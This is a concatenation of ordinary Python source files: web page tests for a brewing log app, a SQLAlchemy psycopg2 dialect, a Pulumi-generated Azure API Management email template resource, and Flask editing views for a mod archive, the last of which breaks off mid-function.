assert brewery.name in rv.text
assert brew.name not in rv.text
@pytest.mark.options(ANNOUNCEMENT_FILE='/tmp/dummy/announcement.md')
def test_announcement_present(self, fs):
file_name = '/tmp/dummy/announcement.md'
fs.create_file(file_name, contents='This **very important** announcement.')
fs.add_real_directory(self.TEMPLATES_DIR)
rv = self.client.get(self.url)
assert '<strong>very important</strong>' in rv.text
@pytest.mark.usefixtures('client_class')
class TestMainPageLoggedInRegularUser(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self, user_factory):
self.url = url_for('home.index')
self.regular_brewery_name = 'regular brewery no 1'
self.hidden_brewery_name = 'hidden brewery no 1'
self.regular_brew_name = 'regular brew no 1'
self.hidden_brew_name = 'hidden brew no 1'
self.user = user_factory()
def test_common_elements(self):
self.login(self.user.email)
rv = self.client.get(self.url)
assert '>Brew Log</a>' in rv.text
assert 'my profile' in rv.text
assert 'login page' not in rv.text
def test_dashboard_brews(self, brew_factory, brewery_factory):
self.login(self.user.email)
brewery = brewery_factory(brewer=self.user, name=self.regular_brewery_name)
regular_brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
hidden_brew = brew_factory(brewery=brewery, name=self.hidden_brew_name)
rv = self.client.get(self.url)
assert regular_brew.name in rv.text
assert hidden_brew.name in rv.text
@pytest.mark.usefixtures('client_class')
class TestMainPageLoggedInHiddenUser(BrewlogTests):
@pytest.fixture(autouse=True)
def set_up(self, user_factory):
self.url = url_for('home.index')
self.brewery_name = 'regular brewery no 1'
self.regular_brew_name = 'regular brew no 1'
self.hidden_brew_name = 'hidden brew no 1'
self.user = user_factory(is_public=False)
def test_common_elements(self):
self.login(self.user.email)
rv = self.client.get(self.url)
assert '>Brew Log</a>' in rv.text
assert 'my profile' in rv.text
assert 'login page' not in rv.text
def test_dashboard_brews(self, brew_factory, brewery_factory):
self.login(self.user.email)
brewery = brewery_factory(brewer=self.user, name=self.brewery_name)
regular_brew = brew_factory(brewery=brewery, name=self.regular_brew_name)
hidden_brew = brew_factory(brewery=brewery, name=self.hidden_brew_name)
rv = self.client.get(self.url)
assert regular_brew.name in rv.text
assert hidden_brew.name in rv.text
|
"""Support for the PostgreSQL database via the psycopg2 driver.
Driver
------
The psycopg2 driver is supported, available at http://pypi.python.org/pypi/psycopg2/ .
The dialect has several behaviors which are specifically tailored towards compatibility
with this module.
Note that psycopg1 is **not** supported.
Connecting
----------
URLs are of the form `postgresql+psycopg2://user@password@host:port/dbname[?key=value&key=value...]`.
psycopg2-specific keyword arguments which are accepted by :func:`~sqlalchemy.create_engine()` are:
* *server_side_cursors* - Enable the usage of "server side cursors" for SQL statements which support
this feature. What this essentially means from a psycopg2 point of view is that the cursor is
created using a name, e.g. `connection.cursor('some name')`, which has the effect that result rows
are not immediately pre-fetched and buffered after statement execution, but are instead left
on the server and only retrieved as needed. SQLAlchemy's :class:`~sqlalchemy.engine.base.ResultProxy`
uses special row-buffering behavior when this feature is enabled, such that groups of 100 rows
at a time are fetched over the wire to reduce conversational overhead.
* *use_native_unicode* - Enable the usage of Psycopg2 "native unicode" mode per connection. True
by default.
* *isolation_level* - Sets the transaction isolation level for each transaction
within the engine. Valid isolation levels are `READ_COMMITTED`,
`READ_UNCOMMITTED`, `REPEATABLE_READ`, and `SERIALIZABLE`.
Transactions
------------
The psycopg2 dialect fully supports SAVEPOINT and two-phase commit operations.
Per-Statement Execution Options
-------------------------------
The following per-statement execution options are respected:
* *stream_results* - Enable or disable usage of server side cursors for the SELECT-statement.
If *None* or not set, the *server_side_cursors* option of the connection is used. If
auto-commit is enabled, the option is ignored.
"""
import random, re
import decimal
from sqlalchemy import util
from sqlalchemy import processors
from sqlalchemy.engine import base, default
from sqlalchemy.sql import expression
from sqlalchemy.sql import operators as sql_operators
from sqlalchemy import types as sqltypes
from sqlalchemy.dialects.postgresql.base import PGDialect, PGCompiler, \
PGIdentifierPreparer, PGExecutionContext, \
ENUM, ARRAY
class _PGNumeric(sqltypes.Numeric):
def bind_processor(self, dialect):
return None
def result_processor(self, dialect, coltype):
if self.asdecimal:
if coltype in (700, 701):
return processors.to_decimal_processor_factory(decimal.Decimal)
elif coltype == 1700:
# pg8000 returns Decimal natively for 1700
return None
else:
raise exc.InvalidRequestError("Unknown PG numeric type: %d" % coltype)
else:
if coltype in (700, 701):
# pg8000 returns float natively for 701
return None
elif coltype == 1700:
return processors.to_float
else:
raise exc.InvalidRequestError("Unknown PG numeric type: %d" % coltype)
class _PGEnum(ENUM):
def __init__(self, *arg, **kw):
super(_PGEnum, self).__init__(*arg, **kw)
if self.convert_unicode:
self.convert_unicode = "force"
class _PGArray(ARRAY):
def __init__(self, *arg, **kw):
super(_PGArray, self).__init__(*arg, **kw)
# FIXME: this check won't work for setups that
# have convert_unicode only on their create_engine().
if isinstance(self.item_type, sqltypes.String) and \
self.item_type.convert_unicode:
self.item_type.convert_unicode = "force"
# When we're handed literal SQL, ensure it's a SELECT-query. Since
# 8.3, combining cursors and "FOR UPDATE" has been fine.
SERVER_SIDE_CURSOR_RE = re.compile(
r'\s*SELECT',
re.I | re.UNICODE)
class PostgreSQL_psycopg2ExecutionContext(PGExecutionContext):
def create_cursor(self):
# TODO: coverage for server side cursors + select.for_update()
if self.dialect.server_side_cursors:
is_server_side = \
self.execution_options.get('stream_results', True) and (
(self.compiled and isinstance(self.compiled.statement, expression.Selectable) \
or \
(
(not self.compiled or
isinstance(self.compiled.statement, expression._TextClause))
and self.statement and SERVER_SIDE_CURSOR_RE.match(self.statement))
)
)
else:
is_server_side = self.execution_options.get('stream_results', False)
self.__is_server_side = is_server_side
if is_server_side:
# use server-side cursors:
# http://lists.initd.org/pipermail/psycopg/2007-January/005251.html
ident = "c_%s_%s" % (hex(id(self))[2:], hex(random.randint(0, 65535))[2:])
return self._connection.connection.cursor(ident)
else:
return self._connection.connection.cursor()
def get_result_proxy(self):
if self.__is_server_side:
return base.BufferedRowResultProxy(self)
else:
return base.ResultProxy(self)
class PostgreSQL_psycopg2Compiler(PGCompiler):
def visit_mod(self, binary, **kw):
return self.process(binary.left) + " %% " + self.process(binary.right)
def post_process_text(self, text):
return text.replace('%', '%%')
class PostgreSQL_psycopg2IdentifierPreparer(PGIdentifierPreparer):
def _escape_identifier(self, value):
value = value.replace(self.escape_quote, self.escape_to_quote)
return value.replace('%', '%%')
class PostgreSQL_psycopg2(PGDialect):
driver = 'psycopg2'
supports_unicode_statements = False
default_paramstyle = 'pyformat'
supports_sane_multi_rowcount = False
execution_ctx_cls = PostgreSQL_psycopg2ExecutionContext
statement_compiler = PostgreSQL_psycopg2Compiler
preparer = PostgreSQL_psycopg2IdentifierPreparer
colspecs = util.update_copy(
PGDialect.colspecs,
{
sqltypes.Numeric : _PGNumeric,
ENUM : _PGEnum, # needs force_unicode
sqltypes.Enum : _PGEnum, # needs force_unicode
ARRAY : _PGArray, # needs force_unicode
}
)
def __init__(self, server_side_cursors=False, use_native_unicode=True, **kwargs):
PGDialect.__init__(self, **kwargs)
self.server_side_cursors = server_side_cursors
self.use_native_unicode = use_native_unicode
self.supports_unicode_binds = use_native_unicode
@classmethod
def dbapi(cls):
psycopg = __import__('psycopg2')
return psycopg
_unwrap_connection = None
def visit_pool(self, pool):
if self.dbapi and self.use_native_unicode:
extensions = __import__('psycopg2.extensions').extensions
def connect(conn, rec):
if self._unwrap_connection:
conn = self._unwrap_connection(conn)
if conn is None:
return
extensions.register_type(extensions.UNICODE, conn)
pool.add_listener({'first_connect': connect, 'connect':connect})
super(PostgreSQL_psycopg2, self).visit_pool(pool)
def create_connect_args(self, url):
opts = url.translate_connect_args(username='user')
if 'port' in opts:
opts['port'] = int(opts['port'])
opts.update(url.query)
return ([], opts)
def is_disconnect(self, e):
if isinstance(e, self.dbapi.OperationalError):
return 'closed the connection' in str(e) or 'connection not open' in str(e)
elif isinstance(e, self.dbapi.InterfaceError):
return 'connection already closed' in str(e) or 'cursor already closed' in str(e)
elif isinstance(e, self.dbapi.ProgrammingError):
# yes, it really says "losed", not "closed"
return "losed the connection unexpectedly" in str(e)
else:
return False
dialect = PostgreSQL_psycopg2
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['EmailTemplateArgs', 'EmailTemplate']
@pulumi.input_type
class EmailTemplateArgs:
def __init__(__self__, *,
api_management_name: pulumi.Input[str],
body: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
subject: pulumi.Input[str],
template_name: pulumi.Input[str]):
"""
The set of arguments for constructing a EmailTemplate resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
pulumi.set(__self__, "api_management_name", api_management_name)
pulumi.set(__self__, "body", body)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "subject", subject)
pulumi.set(__self__, "template_name", template_name)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Input[str]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: pulumi.Input[str]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def body(self) -> pulumi.Input[str]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: pulumi.Input[str]):
pulumi.set(self, "body", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def subject(self) -> pulumi.Input[str]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@subject.setter
def subject(self, value: pulumi.Input[str]):
pulumi.set(self, "subject", value)
@property
@pulumi.getter(name="templateName")
def template_name(self) -> pulumi.Input[str]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@template_name.setter
def template_name(self, value: pulumi.Input[str]):
pulumi.set(self, "template_name", value)
@pulumi.input_type
class _EmailTemplateState:
def __init__(__self__, *,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering EmailTemplate resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] description: The description of the Email Template.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] title: The title of the Email Template.
"""
if api_management_name is not None:
pulumi.set(__self__, "api_management_name", api_management_name)
if body is not None:
pulumi.set(__self__, "body", body)
if description is not None:
pulumi.set(__self__, "description", description)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if subject is not None:
pulumi.set(__self__, "subject", subject)
if template_name is not None:
pulumi.set(__self__, "template_name", template_name)
if title is not None:
pulumi.set(__self__, "title", title)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@api_management_name.setter
def api_management_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_management_name", value)
@property
@pulumi.getter
def body(self) -> Optional[pulumi.Input[str]]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@body.setter
def body(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "body", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
The description of the Email Template.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def subject(self) -> Optional[pulumi.Input[str]]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@subject.setter
def subject(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subject", value)
@property
@pulumi.getter(name="templateName")
def template_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@template_name.setter
def template_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "template_name", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
The title of the Email Template.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
class EmailTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a API Management Email Template.
## Import
API Management Email Templates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: EmailTemplateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a API Management Email Template.
## Import
API Management Email Templates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/emailTemplate:EmailTemplate example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/instance1/templates/template1
```
:param str resource_name: The name of the resource.
:param EmailTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(EmailTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = EmailTemplateArgs.__new__(EmailTemplateArgs)
if api_management_name is None and not opts.urn:
raise TypeError("Missing required property 'api_management_name'")
__props__.__dict__["api_management_name"] = api_management_name
if body is None and not opts.urn:
raise TypeError("Missing required property 'body'")
__props__.__dict__["body"] = body
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if subject is None and not opts.urn:
raise TypeError("Missing required property 'subject'")
__props__.__dict__["subject"] = subject
if template_name is None and not opts.urn:
raise TypeError("Missing required property 'template_name'")
__props__.__dict__["template_name"] = template_name
__props__.__dict__["description"] = None
__props__.__dict__["title"] = None
super(EmailTemplate, __self__).__init__(
'azure:apimanagement/emailTemplate:EmailTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_management_name: Optional[pulumi.Input[str]] = None,
body: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
subject: Optional[pulumi.Input[str]] = None,
template_name: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None) -> 'EmailTemplate':
"""
Get an existing EmailTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] body: The body of the Email. Its format has to be a well-formed HTML document.
:param pulumi.Input[str] description: The description of the Email Template.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] subject: The subject of the Email.
:param pulumi.Input[str] template_name: The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
:param pulumi.Input[str] title: The title of the Email Template.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _EmailTemplateState.__new__(_EmailTemplateState)
__props__.__dict__["api_management_name"] = api_management_name
__props__.__dict__["body"] = body
__props__.__dict__["description"] = description
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["subject"] = subject
__props__.__dict__["template_name"] = template_name
__props__.__dict__["title"] = title
return EmailTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiManagementName")
def api_management_name(self) -> pulumi.Output[str]:
"""
The name of the API Management Service in which the Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "api_management_name")
@property
@pulumi.getter
def body(self) -> pulumi.Output[str]:
"""
The body of the Email. Its format has to be a well-formed HTML document.
"""
return pulumi.get(self, "body")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
The description of the Email Template.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the API Management Email Template should exist. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def subject(self) -> pulumi.Output[str]:
"""
The subject of the Email.
"""
return pulumi.get(self, "subject")
@property
@pulumi.getter(name="templateName")
def template_name(self) -> pulumi.Output[str]:
"""
The name of the Email Template. Possible values are `AccountClosedDeveloper`, `ApplicationApprovedNotificationMessage`, `ConfirmSignUpIdentityDefault`, `EmailChangeIdentityDefault`, `InviteUserNotificationMessage`, `NewCommentNotificationMessage`, `NewDeveloperNotificationMessage`, `NewIssueNotificationMessage`, `PasswordResetByAdminNotificationMessage`, `PasswordResetIdentityDefault`, `PurchaseDeveloperNotificationMessage`, `QuotaLimitApproachingDeveloperNotificationMessage`, `RejectDeveloperNotificationMessage`, `RequestDeveloperNotificationMessage`. Changing this forces a new API Management Email Template to be created.
"""
return pulumi.get(self, "template_name")
@property
@pulumi.getter
def title(self) -> pulumi.Output[str]:
"""
The title of the Email Template.
"""
return pulumi.get(self, "title")
|
"""Views for archivists to edit and manage mods on the archive"""
from tempfile import NamedTemporaryFile
from flask import Blueprint, render_template, request, url_for, redirect, flash, abort
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileRequired
from sqlalchemy.orm.exc import NoResultFound
from mcarch.app import db
from mcarch.login import login_required
from mcarch.model.mod import Mod, ModVersion, ModFile, ModAuthor, GameVersion
from mcarch.model.mod.draft import DraftMod, DraftModVersion, DraftModFile
from mcarch.model.mod.logs import LogMod, LogModVersion, LogModFile
from mcarch.model.file import upload_b2_file
from mcarch.model.user import roles
from mcarch.util.wtforms import BetterSelect
from wtforms import StringField, SelectField, SelectMultipleField, TextAreaField, BooleanField, \
SubmitField
from wtforms.validators import Length, DataRequired, Email, ValidationError
edit = Blueprint('edit', __name__, template_folder="templates")
@edit.route('/mods/<slug>/new-draft', methods=['POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_draft(user, slug):
mod = Mod.query.filter_by(slug=slug).first_or_404()
draft = mod.make_draft(user)
db.session.add(draft)
db.session.commit()
return redirect(url_for('edit.draft_page', id=draft.id))
@edit.route('/draft/<id>', methods=['GET'])
@login_required(role=roles.archivist, pass_user=True)
def draft_page(user, id):
draft = DraftMod.query.filter_by(id=id).first_or_404()
vsns = draft.vsns_by_game_vsn()
return render_template("mods/mod.html", mod=draft, vsns_grouped=vsns, is_draft=True)
@edit.route('/draft/<id>/diff', methods=['GET'])
@login_required(role=roles.archivist, pass_user=True)
def draft_diff(user, id):
draft = DraftMod.query.filter_by(id=id).first_or_404()
diff = draft.draft_diff()
return render_template("editor/draft_diff.html", mod=draft, diff=diff)
class EditModForm(FlaskForm):
name = StringField('Name', validators=[DataRequired(), Length(max=Mod.name.type.length)])
website = StringField('Website', validators=[Length(max=Mod.website.type.length)])
authors = SelectMultipleField("Authors", coerce=int,
widget=BetterSelect(multiple=True))
desc = TextAreaField("Description")
submit = SubmitField('Submit')
def load_authors(self):
"""Loads the authors select choices from the database
This must be called before the form is used.
"""
authors = ModAuthor.query.all()
self.authors.choices = list(map(lambda a: (a.id, a.name), authors))
def get_selected_authors(self):
"""Get a list of authors from the database according to what is selected."""
ids = self.authors.data
return ModAuthor.query.filter(ModAuthor.id.in_(ids)).all()
@edit.route('/edit/new-mod', methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod(user):
form = EditModForm()
form.load_authors()
if request.method == 'POST':
if form.validate_on_submit():
mod = DraftMod(
name=form.name.data,
website=form.website.data,
desc=form.desc.data,
user=user,
)
db.session.add(mod)
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-mod.html', form=form)
@edit.route("/draft/<id>/edit", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod(user, id):
mod = DraftMod.query.filter_by(id=id).first_or_404()
form = EditModForm(name=mod.name, website=mod.website, desc=mod.desc,
authors=list(map(lambda a: a.id, mod.authors)))
authors = form.load_authors()
if request.method == 'POST':
if form.validate_on_submit():
mod.name = form.name.data
mod.website = form.website.data
mod.desc = form.desc.data
mod.authors = form.get_selected_authors()
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-mod.html', form=form, editing=mod)
class EditVersionForm(FlaskForm):
name = StringField('Name', validators=[DataRequired(), Length(max=Mod.name.type.length)])
url = StringField('Web Page', validators=[Length(max=Mod.website.type.length)])
desc = TextAreaField("Description")
gamevsns = SelectMultipleField("Game Versions", coerce=int,
widget=BetterSelect(multiple=True))
submit = SubmitField('Submit')
def load_gamevsns(self):
"""Loads the game version select choices from the database
This must be called before the form is used, or no versions will be listed in the form.
"""
vsns = GameVersion.query.all()
self.gamevsns.choices = list(map(lambda v: (v.id, v.name), vsns))
def get_selected_gamevsns(self):
"""Get a list of authors from the database according to what is selected."""
ids = self.gamevsns.data
return GameVersion.query.filter(GameVersion.id.in_(ids)).all()
@edit.route("/draft/<id>/edit/new-version", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod_version(user, id):
mod = DraftMod.query.filter_by(id=id).first_or_404()
form = EditVersionForm()
form.load_gamevsns()
if request.method == 'POST':
if form.validate_on_submit():
vsn = DraftModVersion(
name=form.name.data,
url=form.url.data,
desc=form.desc.data,
game_vsns=form.get_selected_gamevsns(),
)
mod.mod_vsns.append(vsn)
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-version.html', form=form, mod=mod)
@edit.route("/draft/edit/mod-version/<id>", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def edit_mod_version(user, id):
vsn = DraftModVersion.query.filter_by(id=id).first_or_404()
mod = vsn.mod
form = EditVersionForm(name=vsn.name, url=vsn.url, desc=vsn.desc,
gamevsns=list(map(lambda v: v.id, vsn.game_vsns)))
form.load_gamevsns()
if request.method == 'POST':
if form.validate_on_submit():
vsn.name = form.name.data
vsn.url = form.url.data
vsn.desc = form.desc.data
vsn.game_vsns = form.get_selected_gamevsns()
db.session.commit()
return redirect(url_for('edit.draft_page', id=mod.id))
return render_template('editor/edit-version.html', form=form, mod=mod, editing=vsn)
class EditFileForm(FlaskForm):
file = FileField("Mod File")
desc = TextAreaField("Description")
page_url = StringField('Web Page', validators=[Length(max=Mod.website.type.length)])
direct_url = StringField('Direct Download', validators=[Length(max=Mod.website.type.length)])
redirect_url = StringField('Indirect Download', validators=[Length(max=Mod.website.type.length)])
submit = SubmitField('Submit')
def upload_file(file, user):
"""Uploads a file from a `FileField` to B2 and returns the StoredFile object."""
with NamedTemporaryFile() as tfile:
file.save(tfile)
print(file.filename)
return upload_b2_file(tfile.name, file.filename, user)
@edit.route("/draft/<id>/new-file", methods=['GET', 'POST'])
@login_required(role=roles.archivist, pass_user=True)
def new_mod_file(user, id):
vsn = DraftModVersion.query.filter_by(id=id).first_or_404()
